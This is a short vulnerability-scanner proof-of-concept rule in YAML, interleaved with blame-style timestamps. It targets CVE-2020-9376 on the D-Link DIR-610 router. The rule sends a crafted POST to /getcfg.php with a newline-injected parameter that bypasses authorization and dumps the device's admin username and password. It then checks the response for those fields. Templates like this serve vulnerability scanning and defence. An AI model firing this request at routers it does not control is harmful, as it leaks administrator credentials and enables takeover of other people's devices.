2020-12-29 01:17:10 -08:00
|
|
|
name: poc-yaml-dlink-cve-2020-9376-dump-credentials
|
|
|
|
rules:
|
|
|
|
- method: POST
|
|
|
|
path: /getcfg.php
|
|
|
|
headers:
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
body: >-
|
|
|
|
SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
|
|
|
|
expression: >
|
2021-11-15 19:53:46 -08:00
|
|
|
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
|
2020-12-29 01:17:10 -08:00
|
|
|
detail:
|
|
|
|
author: x1n9Qi8
|
|
|
|
Affected Version: "Dlink DIR-610"
|
|
|
|
links:
|
2021-11-15 19:53:46 -08:00
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
|